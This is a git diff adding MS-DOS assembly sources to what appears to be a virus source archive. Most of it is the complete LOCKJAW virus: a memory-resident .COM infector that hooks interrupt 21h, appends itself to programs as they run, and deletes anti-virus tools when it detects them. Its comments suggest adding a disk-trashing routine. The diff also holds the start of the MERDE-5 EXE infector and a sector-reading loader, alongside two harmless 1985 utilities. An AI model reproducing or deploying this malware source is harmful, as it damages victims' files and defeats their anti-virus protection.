retn +GenerateCryptor endp + +Buffer db 0CDh, 20h, 125 dup (0) +LastByte db 0 +OrgProgram db 1872 dup (0) +seg000 ends + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.loader.asm b/MSDOS/Virus.MSDOS.Unknown.loader.asm new file mode 100644 index 00000000..eb315d86 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.loader.asm @@ -0,0 +1,111 @@ + PAGE ,132 +VIRUS SEGMENT PARA PUBLIC 'CODE' + ASSUME CS:VIRUS,DS:VIRUS + call gyilk + int 20h + nop +gyilk: push ax + push bx + push cx + push dx + push es + push ds + push di + push si + call cim +cim: pop bx + mov si,5aa5h + mov di,55aah + push cs + pop es +ujra: add bx,1000 + cmp bx,1000 + jnc kilep1 + jmp kilep +kilep1: push bx + mov ax,201h + mov dx,80h + mov cx,1 + int 13h + pop bx + jnc tovabb + jmp kilep +tovabb: cmp si,0a55ah + jnz tivbi1 + jmp kilep +tivbi1: mov ax,cs:word ptr [bx] + cmp ax,12cdh + jz kilep +tovbi: push bx + mov ax,201h + mov dx,0h + mov cx,1 + int 13h + pop bx + jnc tovabbi + cmp ah,6 + jz tovbi + jmp kilep +tovabbi: mov ax,cs + add ax,1000h + push bx + push ax + int 12h + mov bx,64 + mul bx + sub ax,1000h + mov bx,ax + pop ax + cmp bx,ax + jnc oke1 + pop bx + jmp kilep +oke1: pop bx +oke: mov es,ax + mov ax,cs:[bx+18h] + mov cx,cs:[bx+1ah] + mul cx + mov cx,ax + mov ax,cs:[bx+13h] + mov dx,0 + div cx + sub bx,1000 + push bx + mov ch,al + mov cl,1 + mov bx,100h + mov dx,0 + mov ax,208h + int 13h + pop bx + jc kilep + push bx + mov bx,100h + mov ax,es:[bx] + cmp ax,2452h + pop bx + jnz kilep + mov ax,bx + add ax,offset kilep-offset cim + push cs + push ax + mov ax,10ah + push es + push ax + retf +kilep: pop si + pop di + pop ds + pop es + pop dx + pop cx + pop bx + pop ax + ret +cime: dw 0 +VEG EQU $ + +VIRUS ENDS + + END +  \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.locate.asm b/MSDOS/Virus.MSDOS.Unknown.locate.asm new file mode 100644 index 00000000..525957ee --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.locate.asm @@ -0,0 +1,231 @@ +CODE_SEG SEGMENT + ASSUME CS:CODE_SEG,DS:CODE_SEG,ES:CODE_SEG + ORG 100H ;Start off right for a .COM file +ENTRY: JMP LOCATE ;Skip over Data area + + COPY_RIGHT DB '(C)1985 S.Holzner' ;Author's Mark + FOUND_MSG DB 13,10,13,10,'FOUND IN $' ;Like it says + LEN DW 1 ;The file length (low word) + PATH_LEN DW 0 ;Length of Path.Dat + NUMBER DW 0 ;Number of bytes read from file + EXTRA_PATHS DB 0 ;=1 if we open & use Path.Dat + OLD_BX DW 0 ;Save pointer to path at CS:DBH + OLD_SI DW 0 ;Save SI as pointer also + START_FLAG DB 0 ;For searches in Path.Dat + PATH_DAT DB "\PATH.DAT",0 ;ASCIIZ string of Path.Dat + +LOCATE PROC NEAR ;Here we go + + MOV DX,0B0H ;Move Disk Transfer Area to CS:0B0H + MOV AH,1AH ;Matched file information goes there + INT 21H + + MOV DI,5CH ;Use CS:5CH to put '*.*'0 at for search + CALL PUT ; in current directory + MOV DX,5CH ;Point to '*.*'0 for search + MOV AH,4EH ; and find first matching file + INT 21H ;Match now at DTA, 0B0H +LOOP: ;Loop over matches now + MOV BX,0CAH ;Get file length, came from match + MOV DX,[BX] + MOV LEN,DX ;Store in Len + CMP DX,60*1024 ;Don't write over stack, allow < 64K files + JB NOT_BIG ;Range extender (Find > 127 bytes ahead) + JMP FIND +NOT_BIG:CMP DX,0 ;Was this a 0 length file (disk dir or label)? + JA FILE_OK ;No, go on and read it + JMP FIND ;Yes, find next file and skip this one +FILE_OK:CALL READ_FILE ;Get the file into memory + MOV CX,NUMBER ;Prepare to loop over all read bytes + MOV DI,OFFSET PATHS+300 ;File starts at Offset Paths+300 +SEARCH: ;Use Repne Scasb & DI to search for the + MOV BX,82H ;first letter of the string, which is at CS:82H + MOV AL,BYTE PTR [BX] ;Load into AL for Repne Scasb +REPNE SCASB ;Find first letter + JCXZ FIND ;If out of file to search, find next file + MOV BX,80H ;How many chars in string? Get from CS:80H + XOR DX,DX ;Set DX to zero + MOV DL,[BX] ;Get # of chars in string + DEC DX ;Get rid of space typed after 'Locate' + MOV SI,83H ;Search from second typed letter (1st matched) +CPLOOP: DEC DX ;Loop counter + CMPSB ;See how far we get until no match + JZ CPLOOP + DEC DI ;At end, reset DI (Scasb increments 1 too much) + CMP DX,0 ;If DX is not zero, all letters did not match + JA SEARCH ;If not a match, go back and get next one + LEA DX,FOUND_MSG ;FILE HAS BEEN FOUND, so say so. + MOV AH,9 ;Request string search + INT 21H + MOV AH,2 ;Now to print filename. Without Path.Dat, at + MOV BX,0DBH ; CS:CEH, with Path.Dat at CS:DBH + CMP EXTRA_PATHS,1 ; Using Path.Dat yet? + JE PRINT ;Yes, print + MOV BX,0CEH ;No, reset BX to point to CS:CEH +PRINT: MOV DL,[BX] ;Print out the filename until 0 found + CMP DL,0 ;Is it 0? + JE MORE ;If yes,print out sample at More: + INT 21H ;Print filename character + INC BX ;Point to next character + JMP PRINT ;Go back relentlessly until done +MORE: PUSH DI ;Save DI,BX,CX + PUSH BX + PUSH CX + MOV CX,40 ;Prepare to type out total of 40 characters + MOV AH,2 ;With Int 21H service 2 + MOV DL,':' ;But first, add ':' to filename + INT 21H ;And a carriage return linefeed + MOV DL,13 + INT 21H + MOV DL,10 + INT 21H + SUB DI,20 ;DI points to end of found string, move back + MOV BX,OFFSET PATHS+300 ;Beginning of file + CMP DI,BX ;If before beginning, start at beginning + JA GO + MOV DI,BX +GO: ADD BX,LEN ;Now BX=end of file (to check if we're past it) +SHOW: MOV DL,[DI] ;Get character from file + INC DI ;And point to next one + CMP DI,BX ;Past end? + JA SHOWS_OVER ;Yes, jump out, look for next match + CMP DL,30 ;Unprintable character? + JA POK ;No, OK + MOV DL,' ' ;Yes, make it a space +POK: INT 21H ;Print Character + LOOP SHOW ;And return for the next one +SHOWS_OVER: ;End of printout + POP CX ;Restore the registers used above + POP BX + POP DI + JMP SEARCH ;Return to search more of the file +FIND: CALL FIND_FILE ;This file done, find next match + CMP AL,18 ;AL=18 --> no match + JE OUT ;And so we leave + JMP LOOP ;If match found, go back once again +OUT: INT 20H ;End of Main Program +LOCATE ENDP + +PUT PROC NEAR ;This little gem puts a '*.*'0 + MOV BYTE PTR [DI],'*' ;Wherever you want it--just send + MOV BYTE PTR [DI+1],'.' ; it a value in DI. '*.*'0 is used as + MOV BYTE PTR [DI+2],'*' ; a universal wilcard in searches + MOV BYTE PTR [DI+3],0 + RET +PUT ENDP + +WS PROC NEAR ;Strip the bits for WordStar + CMP CX,0 ;If there is a length of 0, e.g. + JE FIN ;Directory entries, etc. do nothing. +WSLOOP: AND BYTE PTR [BX],127 ;Set top bit to zero + INC BX ;Point to next unsuspecting byte + LOOP WSLOOP ;And get it too. +FIN: RET ;To use, send this program BX and CX +WS ENDP + +FIND_FILE PROC NEAR ;The file finder + MOV AH,4FH ;Try service 4FH, find next match, first + INT 21H + CMP AL,18 ;AL = 18 --> no match + JE CHECK ;Range extender. + JMP NEW +CHECK: CMP EXTRA_PATHS,1 ;Have we used path.Dat? + JE NEXT_PATH ;Yes, get next path, this one's used up + INC EXTRA_PATHS ;No, set it to 1 + MOV AX,3D00H ;Request file opening for Path.Dat + LEA DX,PATH_DAT ;Point to '\PATH.DAT'0 + INT 21H + JNC READ ;If there was a carry, Path.Dat not found +DONE: MOV AL,18 ;And so we exit with AL=18 + JMP END +READ: MOV CX,300 ;Assume the max length for Path.Dat, 300. + MOV BX,AX ;Move found file handle into BX for read + MOV AH,3FH ;Set up for file read + LEA DX,PATHS ;Put the file at location Paths (at end) + INT 21H ;Read in the file + ADD AX,OFFSET PATHS ;Full offset of end of Path.Dat + MOV PATH_LEN,AX ;Get Path.Dat end point for loop + MOV AH,3EH ;Now close the file + INT 21H ;Close file + MOV OLD_SI,OFFSET PATHS ;Save for future path-readings + MOV CX,300 ;Get ready to Un-WordStar + MOV BX,OFFSET PATHS ;300 bytes at location Paths + CALL WS ;Strip high bit for WS +NEXT_PATH: ;Come here to find next path to search for files + MOV SI,OLD_SI ;Point to start of next path + MOV DI,5CH ;Move will be to CS:5CH for '\path\*.*0' file find + MOV BX,0DBH ;Also to CS:DBH; will assemble full path & filename + MOV START_FLAG,0 ;Start the path search +CHAR: CMP SI,PATH_LEN ;Past end of possible path names? + JGE DONE ;Yes, we're done. Leave with AL=18 + CMP BYTE PTR [SI],30 ;Carriage return or linefeed? + JB NEXT ;Yes, get next char + MOV START_FLAG,1 ;First char, stop skipping chars + MOV AL,[SI] ;Get char from Path.Dat + MOV [BX],AL ;Move char to DBH + INC BX ;And increment to next location there + MOVSB ;Also move to 5CH area + JMP CHAR ;And go back for more +NEXT: CMP START_FLAG,1 ;Bad char, have we been reading a real pathname? + JE PDONE ;Yes, we've reached the end of it. + INC SI ;No, keep skipping chars to find pathname + JMP CHAR +PDONE: MOV OLD_SI,SI ;Save SI for the next path. + MOV BYTE PTR [DI],'\' ;Add '\' to both paths + MOV BYTE PTR [BX],'\' + INC BX ;Move BX on for next time + MOV OLD_BX,BX ;And save it. + INC DI ;Move to next location at 5CH and + CALL PUT ;Put '*.*'0 there to find all files. + MOV DX,5CH ;Start the search for all files in + MOV AH,4EH ; the new path. + MOV CX,0 ;Set the file attribute to 0 + INT 21H + CMP AL,18 ;Did we find any new files in new path? + JE NEXT_PATH ;No, get the next path. +NEW: CMP EXTRA_PATHS,1 ;Yes,Move found filename to DBH area to + JNE END ; read it in-only if DBH area is active + MOV BX,OLD_BX ; (i.e. Extra_Paths=1). Restore BX + MOV SI,0CDH ;And point to found filename in DTA +CLOOP: INC SI ;Next letter from found filename + MOV AH,[SI] ;Move it to the DBH area so we can read + MOV [BX],AH ; in the file (needs pathname\filename) + INC BX ;Next character in 5CH area. + CMP BYTE PTR [SI],0 ;Is this the last character? + JNE CLOOP ;Nope, get next one +END: RET ;After path & filename assembled, return +FIND_FILE ENDP + +READ_FILE PROC NEAR ;Looks for filename at CEH or DBH & reads it + PUSH AX ;Push everything to save it. + PUSH BX + PUSH CX + PUSH DX + MOV DX,0DBH ;Try the DBH area + CMP EXTRA_PATHS,1 ;Has it been used? + JE OK ;Yes + MOV DX,0CEH ;No, not using paths yet, use filename only, at CEH +OK: MOV AX,3D00H ;Prepare for file reading + INT 21H ;And do so. + MOV BX,AX ;Move file handle into BX to read + MOV DX,OFFSET PATHS+300 ;Read into data area at Paths+300 bytes + MOV CX,LEN ;Read the full file's length in bytes + MOV AH,3FH ;Read it in at last + INT 21H + MOV NUMBER,AX ;Number of bytes actually read. + MOV AH,3EH ;Close file + INT 21H + MOV BX,OFFSET PATHS+300 ;Clean up the Word Star high bit. + MOV CX,LEN ;For the full file + CALL WS ;Strip high bit for ws + POP DX ;Pop evrything and return + POP CX + POP BX + POP AX + RET ;Fin of Read_File +READ_FILE ENDP +PATHS: ;Here's the end of program marker + +CODE_SEG ENDS + END ENTRY ;End 'Entry' so DOS starts at 'Entry' + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lock.asm b/MSDOS/Virus.MSDOS.Unknown.lock.asm new file mode 100644 index 00000000..295eddc9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lock.asm @@ -0,0 +1,145 @@ +COMMENT* Change ROR -> ROL in the TWO marked places to produce UNLOCK.ASM * +CODE_SEG SEGMENT + ASSUME CS:CODE_SEG + ORG 100H +HERE: JMP THERE + COPY_RIGHT DB '(C)1985 Steven Holzner' + PROMPT DB 'Phrase: $' ;All the messages & prompts + DEFAULT DB 'FILE.LOC',0 + NOTSEEN DB 13,10,'File Not Found$' + FULL: DB 13,10,'Disk Full$' + FILETWO DW 0 ;Address of 2nd File name + FILEND DW 0 ;End of read-in files in memory +THERE PROC NEAR ;Our procedure + MOV BX,81H ;Make the filenames into ASCIIZ +UP: INC BX ;Scan type-in for space, + CMP BYTE PTR [BX],' ' ;Space? + JNE NOSPACE + MOV BYTE PTR [BX],0 ;Put the Z in ASCIIZ + MOV FILETWO,BX + INC FILETWO ;Store filename starting location +NOSPACE:CMP BYTE PTR [BX],13 ;If not a space, a ? + JNE UP + MOV BYTE PTR [BX],0 ;If yes, replace with a 0 + CMP FILETWO,0 + JNZ OVER + MOV FILETWO,OFFSET DEFAULT ;If no second file given, use default +OVER: LEA DX,PROMPT ;Type out the prompt with string print + MOV AH,9 + INT 21H + MOV BX,80H+40H-2 ;Prepare 40H (64) buffer for key phrase + MOV BYTE PTR [BX],40H + PUSH BX ;Set up buffer address + POP DX + MOV AH,0AH ;Buffered input + INT 21H + MOV BX,80H+40H ;Start of key phrase + PUSH BX +JUMP: CMP BYTE PTR [BX],13 ;Set up key phrase's ASCII values + JE READY ;Scan until + OR BYTE PTR [BX],1 ;Make it odd + AND BYTE PTR [BX],0FH ;Use only lower four bits + INC BX + JMP JUMP ;Keep going until +READY: POP BX + MOV AX,3D00H ;Open the file to encrypt + MOV DX,82H ;Point to its name + INT 21H + JNC OKFILE ;Carry Flag --> some problem, assume + LEA DX,NOTSEEN ; file doesn't exist, say so + MOV AH,9 + INT 21H + JMP OUT ;Exit + +OKFILE: PUSH BX ;Store location in key phrase + MOV BX,AX ;Put handle into BX + MOV CX,62*1024 ;Ask for 62K bytes to be read from file + LEA DX,THEBOTTOM ;And put at end of program + MOV AH,3FH ;Read + INT 21H + ADD AX,OFFSET THEBOTTOM ;Actually read AX bytes + MOV FILEND,AX + DEC FILEND ;Find how far the file extends in mem. + MOV AH,3EH ;Close file, thank you very much. + INT 21H + POP BX + LEA CX,THEBOTTOM ;Save current location in file in CX + +SCRMBLE:MOV SI,CX ;Will scramble from [SI] to [DI] + CMP SI,FILEND ;Past end? + JAE DONE ;If yes, exit + MOV DI,CX + XOR AX,AX + MOV AL,[BX] ;How many to scramble? (from key phrase) + ADD DI,AX + MOV CX,DI + INC CX ;Store new starting location for next time + + INC BX ;Also, get next character for next scramble + CMP BYTE PTR [BX],13 ;If at end of key phrase, wrap + JNE TWIST + MOV BX,80H+40H + +TWIST: CMP DI,FILEND ;Is DI past end? + JBE GRAB + + MOV DI,FILEND ;If yes, only scramble to file end + PUSH DI + SUB DI,SI ;What about last byte? + TEST DI,1 + POP DI + JNZ GRAB ;If left over, rotate it once + ROR BYTE PTR [DI],1 ;<--- ROL FOR UNLOCK!!! + DEC DI + CMP SI,DI + JAE DONE + +GRAB: MOV DH,[SI] ;Get byte 1 + MOV DL,[DI] ;Get byte 2 + PUSH CX + MOV CL,[BX] ;Get number of times to rotate + + INC BX ;Set up key phrase char for next time + CMP BYTE PTR [BX],13 + JNE TWISTER + MOV BX,80H+40H + ;Rotate the hybrid word +TWISTER:ROR DX,CL ;<--- ROL FOR UNLOCK!!! + POP CX + MOV [SI],DH ;And replace the parts + MOV [DI],DL + INC SI ;Point to next part to scramble + CMP SI,DI ;Have SI and DI met yet? + JE SCRMBLE ;If yes, move on to next part to scramble + DEC DI + JMP GRAB ;Go back until done +DONE: MOV AH,3CH ;Done + MOV CX,0 ;Prepare to write out scrambled version + MOV DX,FILETWO + INT 21H ;Create the file + JC ERROR + MOV BX,AX + MOV AH,40H + LEA DX,THEBOTTOM + MOV CX,FILEND ;File size to write + SUB CX,OFFSET THEBOTTOM + INC CX + INT 21H ;Write it out + CMP AX,CX ;If error, (returned)AX .NE. (orig.)CX + JE CLOSE +ERROR: LEA DX,FULL ;Assume disk is full, say so, leave + MOV AH,9 + INT 21H + JMP OUT +CLOSE: MOV AH,3EH ;Otherwise, close the file and exit + INT 21H +OUT: INT 20H +THERE ENDP +THEBOTTOM: ;Read-in file starts here. + CODE_SEG ENDS + END HERE + + + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.lockjaw.asm b/MSDOS/Virus.MSDOS.Unknown.lockjaw.asm new file mode 100644 index 00000000..2af5d95e --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lockjaw.asm @@ -0,0 +1,561 @@ +;LOCKJAW: a .COM-infecting resident virus with retaliatory +;anti-anti-virus capability. Programmed and contributed by Nikademus, for +;Crypt Newsletter 12, Feb. 1993. +; +;LOCKJAW is a resident virus which installs itself in +;memory using the same engine as the original Civil War/Proto-T virus. +; +;LOCKJAW hooks interrupt 21 and infects .COM files on execution, appending +;itself to the end of the "host." +;LOCKJAW will infect COMMAND.COM and is fairly transparent to a +;casual user, except when certain anti-virus programs +;(Integrity Master, McAfee's SCAN & +;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded. +;If LOCKJAW is present and any of these programs are employed from +;a write-protected diskette, the virus will, of course, generate +;"write protect" errors. +; +;LOCKJAW's "stinger" code demonstrates the simplicity of creating a strongly +;retaliating virus by quickly deleting the anti-virus program before it +;can execute and then displaying a "chomping" graphic. Even if the anti- +;virus program cannot detect LOCKJAW in memory, it will be deleted. This +;makes it essential that the user know how to either remove the virus from +;memory before beginning anti-virus measures, or at the least run the +;anti-virus component from a write-protected disk. At a time when retail +;anti-virus packages are becoming more complicated - and more likely that the +;average user will run them from default installations on his hard file - +;LOCKJAW's retaliating power makes it a potentially very annoying pest. +;A virus-programmer serious about inconveniencing a system could do a +;number of things with this basic idea. They are; +; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus +; instantly. +; 2. Alter the_stinger routine, so that the virus immediately attacks the +; hard file. The implementation is demonstrated by LOKJAW-DREI, which +; merely makes the disk inaccessible until a warm reboot if an anti-virus +; program is employed against it. By placing +; a BONA FIDE disk-trashing routine here, it becomes very hazardous for +; an unknowing user to employ anti-virus measures on a machine where +; LOCKJAW or a LOCKJAW-like program is memory resident. +; +;These anti-anti-virus strategies are becoming more numerous in viral +;programming. +; +;For example, Mark Ludwig programmed the features of a direct-action +;retaliating virus in his "Computer Virus Developments Quarterly." +;Peach, Groove and Encroacher viruses attack anti-virus software by +;deletion of files central +;to the functionality of the software. +; +;And in this issue, the Sandra virus employs a number +;of anti-anti-virus features. +; +;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and +;DREI infected files from a system, simply delete the "companion" .COM +;duplicates of your executables. Ensure that the machine has been booted +;from a clean disk. To remove the LOCKJAW .COM-appending virus, at this +;time it will be necessary for you to restore the contaminated files from +;a clean back-up. +; + + .radix 16 + code segment + model small + assume cs:code, ds:code, es:code + + org 100h + +len equ offset last - begin +vir_len equ len / 16d + +host: db 0E9h, 03h, 00h, 43h, 44h, 00h ; host dummy + +begin: + + call virus ; push i.p. onto the stack + +virus: + jmp after_note + +note: + db '[l™‡kõ„W].á.¥Œk†d‰M–$' + db 'ÅH‹$.pâ™Gâ†m.Œ$.….{pâ™Å”-Å].ûƒâ‹†¤Å' + db 'Åh†¥k$.Å¢.€â˜ž' + +after_note: + pop bp ; recalculate change in offset + sub bp,109h + +fix_victim: + mov di,0100h ; restore host's + lea si,ds:[vict_head+bp] ; ! + mov cx,06h ; ! + rep movsb ; first 6 bytes +Is_I_runnin: + mov ax,2C2Ch + int 21h ; call to see if installed + cmp ax, 0DCDh + je Bye_Bye +cut_hole: + mov ax,cs ; get memory control block + dec ax + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last block - + jne abort + mov ax,ds:[0003] + sub ax,100 ; decrease memory + mov ds:0003,ax +Zopy_virus: ; copy to claimed block + mov bx,ax ; PSP + mov ax,es ; virus start + add ax,bx ; in memory + mov es,ax + mov cx,len ; cx = length of virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start of virus + lea di,es:0100 ; point to destination + rep movsb ; start copying the virus + + mov [vir_seg+bp],es + mov ax,cs + mov es,ax ; restore extra segment +Grab_21: + cli + mov ax,3521h ; request address of interrupt 21 + int 21h + mov ds,[vir_seg+bp] + mov ds:[old_21h-6h],bx + mov ds:[old_21h+2-6h],es + mov dx,offset Lockjaw - 6h ; revector to virus + mov ax,2521h + int 21h + sti +abort: + mov ax,cs ; get the hell outa + mov ds,ax ; Dodge + mov es,ax + xor ax,ax + +Bye_Bye: + mov bx,0100h ; hand off to host + jmp bx + +Lockjaw: + pushf ; is i checkin if + cmp ax,2c2ch ; resident + jne My_21h + mov ax,0dcdh + popf + iret + +My_21h: + push ds + push es ; save all registers + push di + push si + push ax + push bx + push cx + push dx +check_exec: + cmp ax,04B00h ; is the file being + jne notforme ; executed? + mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + jmp chk_com ; start potential + ; infection +notforme: + pop dx ; exit + pop cx ; restore all registers + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] +int21: + pushf + call dword ptr cs:[old_21h-6] ; int 21h handler + jc notforme ; exit on error + ret + +chk_com: cld ; this essentially copies + mov di,dx ; the name of the file + push ds ; and sets it up for + pop es ; comparison to the anti- + mov al,'.' ; virus defaults used in + repne scasb ; the_stinger + call the_stinger ; anti-virus stinger + cmp ax, 00ffh ; WAS the program an AV? + je notforme + cmp word ptr es:[di],'OC' ; is it a .com ? + jne notforme ; compare against extension + cmp word ptr es:[di+2],'M' ; masks in these two steps + jne notforme + + call Grab_24 ; set critical error handler + call set_attrib + +open_victim: ; open potential host + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h + call int21 + jc close_file ; leave on error + push cs + pop ds + mov [handle-6],ax ; save handle + mov bx,ax + + call get_date ; save date/time characters + +check_forme: + push cs + pop ds + mov bx,[handle-6] + mov ah,3fh + mov cx,06h ; copy first 6 bytes of host + lea dx,[vict_head-6] + call int21 + mov al, byte ptr [vict_head-6] ; is the prog a exe? + mov ah, byte ptr [vict_head-6]+1 + cmp ax,[exe-6] ; compare with 'ZM' + je save_date ; jump to restore + mov al, byte ptr [vict_head-6]+3 ; is the prog already + mov ah, byte ptr [vict_head-6]+4 ; infected? + cmp ax,[initials-6] + je save_date + + +get_len: + mov ax,4200h + call move_pointer + mov ax,4202h + call move_pointer + sub ax,03h + mov [len_file-6],ax + + call write_jmp ; write the jump to the virus + call write_virus ; at the head of the host + ; write the remainder of the +save_date: ; virus to the end of the file + push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call int21 + +close_file: + mov bx,[handle-6] + mov ah,03eh + call int21 + mov dx,cs:[old_24h-6] + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call int21 + jmp notforme +new_24h: + mov al,3 + iret +the_stinger: ; detection of anti-virus against defaults + cmp word ptr es:[di-3],'MI' ;Integrity Master + je jumptoass + + cmp word ptr es:[di-3],'XR' ;*rx = VIREX + je jumptoass + + cmp word ptr es:[di-3],'PO' ;*STOP = VIRSTOP + jne next1 + cmp word ptr es:[di-5],'TS' + je jumptoass + +next1: cmp word ptr es:[di-3],'VA' ;AV = cpav + je jumptoass ;Central Point + cmp word ptr es:[di-3],'TO' ;*prot = F-prot + jne next2 + cmp word ptr es:[di-5],'RP' + je jumptoass + +next2: cmp word ptr es:[di-3],'NA' ;*scan = McAfee's Scan. + jne next3 + cmp word ptr es:[di-5],'CS' + je jumptoass + + cmp word ptr es:[di-3],'NA' ;*lean = CLEAN. + jne next3 ; why not, eh? + cmp word ptr es:[di-5],'EL' + je jumptoass +next3: ret +jumptoass: + jmp Asshole_det ;Asshole Program + ;Detected, delete +move_pointer: + push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call int21 + ret + +write_jmp: + push cs + pop ds + mov ax,4200h ; move pointer to beginning of host + call move_pointer ; do it, as in move_pointer + mov ah,40h ; write + mov cx,01h ; a byte + lea dx,[jump-6] ; of the jump to LOCKJAW code + call int21 ; out to the host + mov ah,40h ; reset the pointer + mov cx,02h + lea dx,[len_file-6] + call int21 + mov ah,40h ; write the virus's recognition + mov cx,02h ; intials out to the host + lea dx,[initials-6] + call int21 + ret + +write_virus: + push cs + pop ds + mov ax,4202h + call move_pointer ; move the pointer to end of host + mov ah,40 ; write-to-file function + mov cx,len ; length of virus in cx + mov dx,100 + call int21 + ret + +get_date: + mov ax,5700h ; get date/time stamps oh host + call int21 ; stash them in buffers + push cs + pop ds + mov [date-6],dx ;<----- + mov [time-6],cx ;<----- + ret + +Grab_24: + mov ax,3524h ; set up critical error handler + call int21 + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h ; revector error handler to virus + call int21 + ret + +set_attrib: + mov ax,4300h ; retrieve file attributes + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call int21 + and cl,0feh + mov ax,4301h + call int21 + ret +Asshole_det: + mov ds,cs:[name_seg-6] ; the anti-virus file + mov dx,cs:[name_off-6] + mov ax, 4301h ; clear attributes + mov cx, 00h + call int21 + mov ah, 41h ; delete it + call int21 +chomp: + push cs ; da chomper visual + pop ds + mov ah, 03h + int 10h + mov [c1-6], bh ; save cursor + mov [c2-6], dh + mov [c3-6], dl + mov [c4-6], ch + mov [c5-6], cl + mov ah, 1 + mov cl, 0 + mov ch, 40h + int 10h + + mov cl, 0 + mov dl, 4Fh + mov ah, 6 + mov al, 0 + mov bh, 0Fh + mov ch, 0 + mov cl, 0 + mov dh, 0 + mov dl, 4Fh + int 10h + + mov ah, 2 + mov dh, 0 + mov dl, 1Fh + mov bh, 0 + int 10h + + mov dx, offset eyes - 6 ; print the eyes + mov ah, 9 + mov bl, 0Fh + call int21 + + mov ah, 2 + mov dh, 1 + mov dl, 0 + int 10h + + mov ah, 9 + mov al, 0DCh + mov bl, 0Fh + mov cx, 50h + int 10h + + mov ah, 2 + mov dh, 18h + mov dl, 0 + int 10h + + mov ah, 9 + mov al, 0DFh + mov bl, 0Fh + mov cx, 50h + int 10h + + mov dl, 0 +chomp_1: + mov ah, 2 + mov dh, 2 + int 10h + + mov ah, 9 + mov al, 55h + mov bl, 0Fh + mov cx, 1 + int 10h + + mov ah, 2 + mov dh, 17h + inc dl + int 10h + + mov ah, 9 + mov al, 0EFh + mov bl, 0Fh + int 10h + + inc dl + cmp dl, 50h + jl chomp_1 + mov [data_1-6], 0 +chomp_3: + mov cx, 7FFFh ; delays + +locloop_4: + loop locloop_4 + + inc [data_1-6] + cmp [data_1-6], 0Ah + jl chomp_3 + mov [data_1-6], 0 + mov cl, 0 + mov dl, 4Fh +chomp_5: + mov ah, 6 + mov al, 1 + mov bh, [data_2-6] + mov ch, 0Dh + mov dh, 18h + int 10h + + mov ah, 7 + mov al, 1 + mov bh, [data_2-6] + mov ch, 0 + mov dh, 0Ch + int 10h + mov cx, 3FFFh ; delays + +locloop_6: + loop locloop_6 + inc [data_1-6] + cmp [data_1-6], 0Bh + jl chomp_5 + mov [data_1-6], 0 +chomp_7: + mov cx, 7FFFh ; delays + +locloop_8: + loop locloop_8 + inc [data_1-6] + cmp [data_1-6], 0Ah + jl chomp_7 + mov ah, 6 + mov al, 0 + mov bh, [data_2-6] + mov ch, 0 + mov cl, 0 + mov dh, 18h + mov dl, 4Fh + int 10h + + mov cl, 7 + mov ch, 6 + int 10h + + mov ah, 2 + mov bh, [c1-6] + mov dh, [c2-6] + mov dl, [c3-6] + int 10h + mov al, bh + mov ah, 5 + int 10h + mov ah, 1 + mov ch, [c4-6] + mov cl, [c5-6] + int 10h + mov ax, 0003h + int 10h ; sort of a cls + mov ax, 00ffh + ret + + +eyes db '(o) (o)','$' ; ASCII eyes +vict_head db 090h, 0cdh, 020h, 043h, 044h, 00h ; 6 bytes of host +jump db 0E9h +initials dw 4443h ; I.D. +exe dw 5A4Dh ; ZM - ident for .EXE files +last db 090h + +data_1 db 0 +data_2 db 0 +old_21h dw 00h,00h +old_24h dw 00h,00h +old_10h dw 00h,00h +name_seg dw ? +name_off dw ? +vir_seg dw ? +len_file dw ? +handle dw ? +date dw ? +time dw ? +c1 db 0 +c2 db 0 +c3 db 0 +c4 db 0 +c5 db 0 + +code ends + end host + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.loki1237.asm b/MSDOS/Virus.MSDOS.Unknown.loki1237.asm new file mode 100644 index 00000000..54030d72 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.loki1237.asm @@ -0,0 +1,613 @@ +; Okay, here is my newest version.. It now +; offers EXE infection. I messed up command.com +; compatibility so this version won't infect it. +; Also, this version might be a little shakey, +; but it should work okay with most setups +; (I'm not professional yet, so screw 'em +; if this hangs!).. +; This will be the last time I release code for +; my virii. Thanks to firststrike, and anyone else +; who has given me tips..... +; Be careful not to get this, it is kinda hard to get rid +; of (it would be REALLY hard to get rid of if it infected +;command.com- I will have to fix that (along with the TERRIBLE +; inefficiency in my interrupt handler (the loader is OKAY, but +; My_21 is just kind of a jumble of code thrown together for now. +; If you want to vaccinate your system, and you know a little about +; assembler, it isn't that hard. (I gave the come version to +; myself about 3 times). Just take notice of my use of interrupt +; 71...(This will be changed in future versions, for obvious reasons). +; MERDE-5 The merde virus version 5.0- loki + + +compare_val equ 850 +interrupt equ 21h +Code_seg Segment Byte + Assume DS:Code_seg, CS:Code_seg + ORG 100h + +start: call get_ip + +exe_or_com: + dw 'CO' +get_ip: + pop di + sub di,3 + cmp word ptr cs:[di+3],'EX' + jne com_memory_loader + jmp exe_memory_loader + +;Load memory from within an EXE file.. +;------------------------------------------------------------------------------ +exe_memory_loader: + call check_for_int_71 + jc go + call get_memory ;es=my_segment + jnc aaaa + jmp exit_exe +aaaa: + call hide_memory + call set_int_71 + call save_21 + push ds + call move_all_code + pop ds + mov bx,es + call set_21 +go: jmp exit_exe + 